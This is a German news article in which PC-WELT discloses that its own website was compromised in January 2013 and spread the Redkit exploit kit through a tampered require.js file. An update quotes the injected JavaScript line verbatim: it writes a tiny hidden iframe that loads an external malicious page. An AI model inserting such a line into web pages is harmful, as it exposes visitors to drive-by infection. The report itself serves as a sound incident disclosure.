28.01.2013, 14:45

Hans-Christian Dirscherl

In eigener Sache

pcwelt.de ist wieder Malware-frei

Malware-Attacke auf pcwelt.de beendet

Die Webseite der PC-WELT, pcwelt.de, wurde am Wochenende angegriffen und zur Verbreitung von Malware missbraucht. Aktueller Stand: Pcwelt.de ist wieder frei von Schädlingen. Wir sind außerdem dabei die Sicherheitslücke zu schließen.
Am Samstag, den 26.01.13, haben die Webmaster der PC-WELT festgestellt, dass die Webseite der PC-Welt zunächst im Browser Chrome eine Malware-Warnung auslöst. Ab zirka 10:00 Uhr erschien auch in Firefox ein Warnhinweis auf Malware, wenn man pcwelt.de aufrufen wollte.
 
Unsere Techniker begannen sofort mit der Ursachenforschung und haben das Problem identifizieren und die Malware auch beseitigen können. Anschließend haben wir die Seite sofort in den Google Webmaster Tools als bereinigt gemeldet, sodass die Seite www.pcwelt.de ab zirka 22:30 Uhr wieder erreichbar war (für www.pc-welt.de und die RSS-Feeds läuft diese Meldung bei den Google Webmaster Tools derzeit noch).
 
Ursache für den Warnhinweis war eine manipulierte Javascript-Datei, die eine iFrame-Injection auf allen unseren Seiten auslöste. Die Recherchen der pcwelt.de-Webmaster ergaben, dass dieser Exploit vermutlich seit Freitag auf dem Server ausgenutzt wurde.
 
Über diese iFrame-Injection wurde dann der entsprechende Schadcode verbreitet. Bisher konnten wir die Lücke für die Attacke noch nicht ausfindig machen. Die bisher analysierten Daten lassen vermuten, dass es sich um eine Drive-by-Attacke handelte, also ein Angriff ohne wirkliche Systematik. Die Technik-Abteilung der PC-WELT sucht derzeit nach weiteren Detailinformationen zu diesem Angriff und ergreift zusätzlich Maßnahmen, um künftig solche Angriffe vermeiden zu können.
Update 15:00 Uhr:
Dem Angreifer war es gelungen eine Javascript-Datei (require.js), die wir auf jeder pcwelt.de-Seite mit ausliefern, durch eine (bis dato noch unbekannte) Sicherheitslücke derart zu kompromittieren, dass dieses zusätzliche Stück Javascript-Code sich in der require.js befand:
document.write('<iframe src="http://aod.org.hk/help/index2.php" width=1% height=1%></iframe>');
 
Diese Zeile JS-Code schreibt direkt unter das öffnende <body>-Tag einen iFrame, der bei jedem Seitenaufruf mit aufgerufen wird, genauer gesagt: dessen Inhalt. Innerhalb dieses iFrames wurde eine Schadsoftware (ein Redkit Exploit Kit) ausgeliefert, das u.a. beispielsweise versucht, die UAC (User Account Control, Benutzerkontensteuerung) von Windows auszuhebeln.
 
Dieses Verhalten führte dazu, dass Google pcwelt.de als "malicious site" einstufte, wodurch wir bei Google und auch bei https://www.stopbadware.org / als schädlich und Schadcode-verbreitend eingestuft wurden.
 
Durch einen Whitelisting-Antrag über die Google Webmaster Tools konnten wir die pcwelt.de wieder vom "Vorhang" befreien. Jedoch geht das Domain nach Domain, so dass einzelne Domains von uns von Google noch nicht wieder als sauber eingestuft worden sind, obwohl keine Malware mehr darüber verbreitet wird.

 
Kommentare zu diesem Artikel (121)
PC-WELT Hacks
PC-WELT Hacks Logo
Technik zum Selbermachen

3D-Drucker selbst bauen, nützliche Life-Hacks für den PC-Alltag und exotische Projekte rund um den Raspberry Pi. mehr

1674044
Content Management by InterRed